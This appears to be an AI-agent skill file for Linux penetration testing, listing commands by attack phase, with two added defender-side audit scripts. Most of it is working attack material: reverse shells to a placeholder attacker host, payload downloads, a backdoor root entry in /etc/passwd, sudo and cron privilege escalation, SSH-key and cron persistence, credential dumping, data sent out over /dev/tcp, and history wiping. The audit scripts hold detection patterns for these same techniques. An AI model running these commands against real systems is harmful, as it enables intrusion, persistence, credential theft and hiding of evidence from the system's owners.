---
name: linux-pentesting-commands
description: Practical Linux command reference for penetration testing covering recon, enumeration, exploitation, privilege escalation, and post-exploitation
triggers:
- how do I enumerate services on a Linux target
- show me privilege escalation commands for pentesting
- what are common recon commands for Linux pentesting
- help me with post-exploitation on a compromised Linux system
- give me enumeration techniques for Linux machines
- show me exploitation commands for Linux pentesting
- what commands should I use for lateral movement on Linux
- help me escalate privileges on a Linux box
---
# Linux Pentesting Commands Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
This skill provides expertise in using the **Linux for a Pentester** repository, a curated collection of practical Linux commands organized by penetration testing phases. The repository serves as a comprehensive command reference built from real-world labs, CTFs, and hands-on practice.
## What This Project Provides
A structured collection of Linux pentesting commands organized into:
- **General Commands**: Essential system survival and navigation
- **Reconnaissance**: Local and network discovery
- **Enumeration**: Service and user data deep-diving
- **Exploitation**: Initial access and foothold techniques
- **Privilege Escalation**: Techniques to gain root access
- **Post-Exploitation**: Persistence, cleanup, lateral movement
- **Cheatsheets**: Quick reference one-liners
## Installation & Setup
```bash
# Clone the repository
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
# Browse the structure
ls -la
# Navigate to specific modules
cd 01-Recon/
cd 04-Privilege-Escalation/
```
This is a reference repository, not an installable tool. Use it alongside your pentesting workflow.
## Key Command Categories
### General Commands (00-General-Commands/)
Essential Linux navigation and system commands:
```bash
# File operations
find / -name "*.conf" 2>/dev/null
grep -ri "password" /home/ 2>/dev/null
locate suid 2>/dev/null
# System information
uname -a
cat /etc/os-release
hostname
id
whoami
# Process management
ps aux | grep root
top
netstat -tulnp
ss -tulnp
```
### Reconnaissance (01-Recon/)
Local and network reconnaissance techniques:
```bash
# Network discovery
ip addr show
ifconfig
arp -a
route -n
# Port scanning
nmap -sV -sC -p- <target>
netstat -ano
ss -tuln
# User enumeration
cat /etc/passwd
cat /etc/group
w
who
last
# Hostname and DNS
hostname -f
cat /etc/hosts
cat /etc/resolv.conf
```
### Enumeration (02-Enumeration/)
Deep service and system enumeration:
```bash
# Service enumeration
systemctl list-units --type=service
ps aux
netstat -tulnp | grep LISTEN
# File system enumeration
find / -perm -4000 2>/dev/null # SUID binaries
find / -writable -type d 2>/dev/null # Writable directories
find /home -type f -readable 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
# Capabilities
getcap -r / 2>/dev/null
# Environment variables
env
echo $PATH
cat /proc/self/environ
```
### Exploitation (03-Exploitation/)
Initial access and foothold techniques:
```bash
# Reverse shells
bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1
nc -e /bin/bash <attacker-ip> 4444
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
# Shell upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
# File transfer
wget http://<attacker-ip>/file -O /tmp/file
curl http://<attacker-ip>/file -o /tmp/file
scp user@<attacker-ip>:/path/file /tmp/
# Local file inclusion (files commonly read once an LFI bug is found)
cat /etc/passwd
cat /var/log/apache2/access.log
```
### Privilege Escalation (04-Privilege-Escalation/)
Techniques to escalate to root:
```bash
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
# Sudo abuse
sudo -l
sudo -u#-1 /bin/bash # CVE-2019-14287
# Writable /etc/passwd (double quotes so the $(openssl ...) hash is expanded; single quotes would write the literal text)
echo "hacker:$(openssl passwd -1 -salt hack password123):0:0:root:/root:/bin/bash" >> /etc/passwd
# Cron job abuse
echo 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1' > /tmp/malicious.sh
chmod +x /tmp/malicious.sh
# Wait for cron to execute
# Kernel exploits
uname -r
searchsploit "Linux Kernel $(uname -r)"
# Capabilities abuse
getcap -r / 2>/dev/null
# Example: python with cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# PATH hijacking
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
```
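The enumeration and privilege escalation commands above are the attacker's view of a handful of misconfigurations; the script below is the defender's view of the same ones. It is an added example, not code from the Linux-for-a-Pentester repository. It assumes a Linux host with GNU find, grep and sed; the SUID allowlist, the `--run` flag and the check names are my own conventions. Every check takes a root directory so it can be pointed at a test tree, which is how the functions are exercised; `sh audit.sh --run` runs all of them against the live host.

```shell
#!/bin/sh
# Defender-side audit for the conditions the enumeration and privilege
# escalation sections hunt for. Added example, not code from the
# Linux-for-a-Pentester repository; assumes Linux with GNU find, grep, sed.
# Every check takes a root directory so it can be pointed at a test tree;
# findings are printed one per line, and silence means nothing was found.

# sudo before 1.8.28 honours "-u#-1" (CVE-2019-14287). $1 is a version string
# such as "1.8.27p1" or "1.9.5"; exit status 0 means the version is affected.
sudo_affected() {
    set -- $(printf '%s\n' "$1" | tr '.p' '  ')   # "1.8.27p1" -> 1 8 27 1
    [ $(( ${1:-0} * 1000000 + ${2:-0} * 1000 + ${3:-0} )) -lt 1008028 ]
}

# Account database files that everyone may write to (the "writable
# /etc/passwd" case). find -perm -0002 matches when the other-write bit is set.
writable_account_files() {
    root="${1:-/}"; root="${root%/}"
    for f in "$root/etc/passwd" "$root/etc/shadow" "$root/etc/sudoers"; do
        if [ -n "$(find "$f" -perm -0002 2>/dev/null)" ]; then
            echo "WRITABLE: $f"
        fi
    done
}

# Reads paths on stdin and prints those not in the allowlist $1 (one absolute
# path per line). Split out from unexpected_suid so it can be tested on its own.
outside_allowlist() {
    while IFS= read -r p; do
        printf '%s\n' "$1" | grep -qxF -- "$p" || echo "SUID: $p"
    done
}

# SUID executables on the root filesystem that are not on the allowlist $2.
unexpected_suid() {
    root="${1:-/}"; root="${root%/}"
    find "${root:-/}" -xdev -type f -perm -4000 2>/dev/null \
        | sed "s|^$root||" | outside_allowlist "$2"
}

# getcap output lines granting a capability that a local user can turn into
# root. Reads "getcap -r /" output on stdin; matches both the older
# "file = cap+ep" and the newer "file cap=ep" formats.
dangerous_caps() {
    grep -E 'cap_(setuid|setgid|dac_override|dac_read_search|sys_admin|sys_ptrace|sys_module|fowner|chown)' \
        | sed 's/^/CAP: /'
}

# Crontab entries whose program is writable by others (the "cron job abuse"
# case). Reads crontab text on stdin; $1 is the root directory.
writable_cron_targets() {
    root="${1:-/}"; root="${root%/}"
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' | while IFS= read -r line; do
        set -f; set -- $line; set +f   # split on blanks without globbing the "*" fields
        case "$1" in                   # "@reboot user cmd" or "m h dom mon dow user cmd"
            @*) [ $# -ge 3 ] || continue; shift 1 ;;
            *)  [ $# -ge 7 ] || continue; shift 5 ;;
        esac
        case "$2" in /*) ;; *) continue ;; esac   # only absolute program paths
        if [ -n "$(find "$root$2" -perm -0002 2>/dev/null)" ]; then
            echo "CRON: $1 runs world-writable $2"
        fi
    done
}

# Directories in a PATH value ($1) that others can write to (the "PATH
# hijacking" case). -prune stops find from descending into the directory.
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        [ -d "$d" ] || continue
        if [ -n "$(find "$d" -prune -perm -0002)" ]; then
            echo "PATH: $d"
        fi
    done
}

# Run every check against the live host. The SUID allowlist is a placeholder;
# replace it with the list your distribution actually ships.
audit() {
    v=$(sudo -V 2>/dev/null | sed -n '1s/^Sudo version //p')
    if [ -n "$v" ] && sudo_affected "$v"; then
        echo "SUDO: version $v is affected by CVE-2019-14287"
    fi
    writable_account_files /
    unexpected_suid / "$(printf '%s\n' /usr/bin/sudo /usr/bin/passwd /usr/bin/su)"
    if command -v getcap >/dev/null 2>&1; then
        getcap -r / 2>/dev/null | dangerous_caps
    fi
    if [ -r /etc/crontab ]; then
        writable_cron_targets / < /etc/crontab
    fi
    writable_path_dirs "$PATH"
}

case "${1:-}" in --run) audit ;; esac
```

The checks deliberately test mode bits with `find -perm -0002` rather than `[ -w ]`, because `-w` answers "can the current user write this", while the question a defender needs answered is "can every local user write this". Running the audit from cron and diffing its output against the previous run turns it into a cheap drift detector for the misconfigurations the section above exploits.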
### Post-Exploitation (05-Post-Exploitation/)
Persistence and lateral movement:
```bash
# Persistence - SSH keys
mkdir -p /root/.ssh
echo 'ssh-rsa <your-public-key>' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Persistence - Cron
echo '*/5 * * * * /bin/bash -c "bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1"' | crontab -
# Credential harvesting
cat /home/*/.bash_history
grep -r "password" /home/ 2>/dev/null
grep password /var/log/auth.log
# Network pivoting
ssh -D 1080 user@target # SOCKS proxy
ssh -L 8080:internal-host:80 user@target # Port forwarding
# Cleanup
history -c
rm ~/.bash_history
ln -sf /dev/null ~/.bash_history
```
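Each persistence and cleanup step listed above leaves an artifact on disk, and the script below looks for those artifacts: SSH keys that are not on an approved list, crontab lines with the shape of the reverse-shell entry, and shell histories pointed at `/dev/null` or removed. It is an added example, not code from the Linux-for-a-Pentester repository. It assumes Linux with GNU grep, sed and awk and OpenSSH-format `authorized_keys`; the `APPROVED_KEYS` path, the `--run` flag and the constructed sample keys and cron lines used to exercise it are my own.

```shell
#!/bin/sh
# Defender-side checks for the persistence and cleanup steps in the
# post-exploitation section. Added example, not code from the
# Linux-for-a-Pentester repository; assumes Linux with GNU grep/sed/awk and
# OpenSSH-format authorized_keys. Each function takes a root directory ($1,
# default "/") so it can be run against a test tree; findings print one per line.

# Extracts "keytype base64" from one authorized_keys line, dropping any
# leading options such as command="..." or from="...".
key_material() {
    printf '%s\n' "$1" | awk '{ for (i = 1; i < NF; i++)
        if ($i ~ /^(sk-)?(ssh|ecdsa)-/) { print $i " " $(i + 1); exit } }'
}

# authorized_keys entries (root and every home under /home) whose key is not
# in the approved list $2, given as one "keytype base64 [comment]" per line.
unapproved_ssh_keys() {
    root="${1:-/}"; root="${root%/}"
    approved=$(printf '%s\n' "$2" | awk 'NF >= 2 { print $1 " " $2 }')
    for f in "$root"/root/.ssh/authorized_keys "$root"/home/*/.ssh/authorized_keys; do
        [ -f "$f" ] || continue
        grep -Ev '^[[:space:]]*(#|$)' "$f" | while IFS= read -r line; do
            key=$(key_material "$line")
            if [ -z "$key" ] || ! printf '%s\n' "$approved" | grep -qxF -- "$key"; then
                echo "SSHKEY: ${f#$root}: ${key:-$line}"
            fi
        done
    done
}

# Crontab lines that look like the reverse-shell persistence entry: they open
# /dev/tcp, run netcat with -e, spawn "bash -i", or decode base64 on the fly.
# Reads crontab text on stdin; $1 labels the source file in the output.
suspicious_cron_lines() {
    grep -Ev '^[[:space:]]*#' \
        | grep -E '/dev/tcp/|(^|[^[:alnum:]])nc .*-e |bash -i|base64 +(-d|--decode)' \
        | sed "s|^|CRON ${1:-stdin}: |"
}

# Scans the system crontab, /etc/cron.d and the per-user spool directories.
scan_crontabs() {
    root="${1:-/}"; root="${root%/}"
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/*; do
        if [ -f "$f" ]; then
            suspicious_cron_lines "${f#$root}" < "$f"
        fi
    done
}

# Shell history redirected to /dev/null or deleted (the "cleanup" steps).
# A missing history for an account that has a .bashrc is reported too; it may
# simply be an account that was never used interactively, so verify by hand.
history_tampering() {
    root="${1:-/}"; root="${root%/}"
    for h in "$root"/root "$root"/home/*; do
        [ -d "$h" ] || continue
        f="$h/.bash_history"
        if [ -L "$f" ] && [ "$(readlink "$f")" = /dev/null ]; then
            echo "HISTORY: ${f#$root} links to /dev/null"
        elif [ -f "$h/.bashrc" ] && [ ! -e "$f" ]; then
            echo "HISTORY: ${f#$root} missing"
        fi
    done
}

# Run every check against the live host. APPROVED_KEYS is a placeholder path
# for the list of keys your team has authorised.
audit() {
    approved=$(cat "${APPROVED_KEYS:-/etc/ssh/approved_keys}" 2>/dev/null)
    unapproved_ssh_keys / "$approved"
    scan_crontabs /
    history_tampering /
}

case "${1:-}" in --run) audit ;; esac
```

The key comparison deliberately ignores the comment field and any leading options, since both are attacker-controlled text that would otherwise let a known key slip past with a changed label. The cron signatures are heuristics tuned to the entries shown on this page; a centralised copy of each host's crontabs, compared over time, catches the quieter variants these patterns miss.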
## Common Patterns
### Quick System Assessment
```bash
#!/bin/bash
# Quick enumeration script
echo "[*] System Information"
uname -a
cat /etc/os-release
echo "[*] Current User"
id
whoami
echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null
echo "[*] Sudo Rights"
sudo -l
echo "[*] Network Connections"
ss -tulnp
echo "[*] Cron Jobs"
cat /etc/crontab
ls -la /etc/cron.*
```
### Automated Enumeration
```bash
# Use LinPEAS for comprehensive enumeration
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Use LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
```
### Reverse Shell Listener
```bash
# On attacker machine
nc -lvnp 4444
# Or use rlwrap for better shell
rlwrap nc -lvnp 4444
# Or use pwncat for automatic shell upgrade
pwncat-cs -lp 4444
```
## Real-World Workflow
### Phase 1: Initial Access
```bash
# After compromising a service, get a shell
bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'
# Upgrade the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm
```
### Phase 2: Enumeration
```bash
# Basic system info
id && hostname && uname -a
# Check sudo rights
sudo -l
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check for capabilities
getcap -r / 2>/dev/null
# Review cron jobs
cat /etc/crontab
```
### Phase 3: Privilege Escalation
```bash
# If sudo misconfiguration found
sudo <vulnerable-binary>
# If writable script in cron
echo 'chmod +s /bin/bash' > /path/to/writable/script.sh
# If SUID binary exploitable
/path/to/suid/binary <exploit-technique>
```
### Phase 4: Post-Exploitation
```bash
# Establish persistence (double quotes so $YOUR_PUBLIC_KEY is expanded)
echo "ssh-rsa $YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys
# Dump credentials
cat /etc/shadow
grep -r "password" /var/www/html/ 2>/dev/null
# Clean tracks
history -c && rm ~/.bash_history
```
## Troubleshooting
### Shell Issues
```bash
# If Python not available, try Python2
python -c 'import pty;pty.spawn("/bin/bash")'
# If no Python, try script
script -qc /bin/bash /dev/null
# If shell dies, check for process monitoring
ps aux | grep -i monitor
```
### Permission Denied Errors
```bash
# Redirect stderr to hide errors
find / -name "*.conf" 2>/dev/null
# Use sudo if available
sudo find /root -name "*.conf"
# Check current capabilities
capsh --print
```
### Network Connectivity Issues
```bash
# Check firewall rules
iptables -L -n
nft list ruleset
# Test connectivity
ping -c 1 $ATTACKER_IP
curl http://$ATTACKER_IP
# Alternative file transfer if wget/curl blocked
cat /path/to/file > /dev/tcp/$ATTACKER_IP/8080
```
## Best Practices
1. **Always redirect stderr** when searching: `2>/dev/null`
2. **Upgrade shells immediately** after initial access
3. **Document findings** as you enumerate
4. **Test exploits carefully** to avoid system crashes
5. **Clean up artifacts** after post-exploitation
6. **Use environment variables** for attacker IP: `export ATTACKER_IP=10.10.14.5`
## Integration with Tools
```bash
# Combined with Metasploit
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4444 -f elf > shell.elf
# Combined with searchsploit
searchsploit -m <exploit-id>
# Combined with GTFOBins
# Visit https://gtfobins.github.io/ and search for SUID binary
# Combined with automated tools
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
bash linpeas.sh
```
This skill enables AI agents to provide practical, command-level assistance for Linux penetration testing workflows based on the organized reference material in this repository.
Creator's repository · aradotso/security-skills